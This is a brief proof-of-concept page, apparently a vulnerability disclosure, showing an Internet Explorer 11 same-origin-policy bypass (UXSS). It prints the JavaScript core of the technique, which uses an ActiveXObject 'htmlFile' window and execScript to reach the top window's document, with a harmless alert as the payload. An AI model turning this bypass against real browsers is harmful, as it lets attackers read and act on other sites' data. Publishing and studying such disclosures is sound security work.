IE11 - UXSS / SOP Bypass

Below we have an iframe pointing to which can access this top window DOM bypassing the SOP policy.

The code inside the iFrame is simple:

doc = new ActiveXObject("htmlFile");
win = doc.Script; // window object of the above document
win.opener = top; // pass a reference to the top window
win.execScript("alert(opener.document.URL)");// Full SOP bypass

If you have questions, contact me here: @magicmac2000
For more information about this vulnerability, UXSS IE ActiveXObject/htmlFile